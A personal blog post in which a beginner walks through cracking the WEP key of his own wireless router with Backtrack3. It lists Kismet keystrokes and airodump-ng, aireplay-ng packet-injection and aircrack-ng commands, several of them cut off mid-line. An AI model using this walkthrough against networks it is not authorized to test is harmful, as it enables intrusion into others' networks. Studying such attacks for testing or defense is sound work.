This is using a stock Asus EEE PC 8G with stock drivers.
I installed Backtrack3 on a 1gig USB drive and booted up with it.
My Asus is my first Linux experience and all of the information I used is from this page: "http://ryanunderdown.com/2007/02/12/cracking-wep-using-backtrack/"
I had to modify some of my commands for whatever reason, but it wasn't too hard after some Googling to get more effective commands.
I have no specific knowledge of Linux operating systems or hacking networks. I set up a network with a DLink Router using 128-bit WEP encryption.
I hacked my OWN network, not anyone else's.
I did notice that until I made one of my computers re-connect to the secure network, I was not picking up any arp (ivs) packets that I needed in order to decrypt.
One problem I had (have) is that after I successfully cracked the password, I couldn't figure out how to get my wireless device out of monitor mode. I simply reset the computer and input the password to make sure it worked. I thought that by quitting kismet it would come back, but it didn't. Stopping and restarting it also didn't work.
The website listed above is a great, simple run-down of how to do this, and below are the specific commands I used to accomplish the crack.
Open Kismet
Select ath0
Press "s" to arrange networks
Press "P" to arrange by # packets
Press "L" to lock the channel on selected channel
Press "enter" on network to get name (SSID) and MAC (BSSID) and Channel (1-11)
Press "c" to make sure you have clients on the network in question
Use airodump to capture IV packets (the ones with password info)
type "airodump-ng --ivs -w /root/Desktop/ --channel
this will put two files on your desktop (-01.ivs & -01.txt) ; these files are capturing the ivs packets you need to decrypt the network password
Associate wireless card with aireplay for packet injecting
type "aireplay-ng -1 0 -e
-1 = type of attack = fake AP authentication
0 = delay in attack
-e = SSID (name) of Access Point
-a = (Access Point MAC)
-h = WIFI CARD MAC
ath0 = wireless interface ID
Start Packet Injection
type "aireplay-ng -3 -b
When you have about 250-500k IV packets (not total packets) you can move on.
Using aircrack
TYPE "aircrack-ng -s /root/Desktop/-01.ivs"
This will bring up a network list to crack - pick the one you want
This will analyze the packets and look for the passwords in the ivs files
No comments:
Post a Comment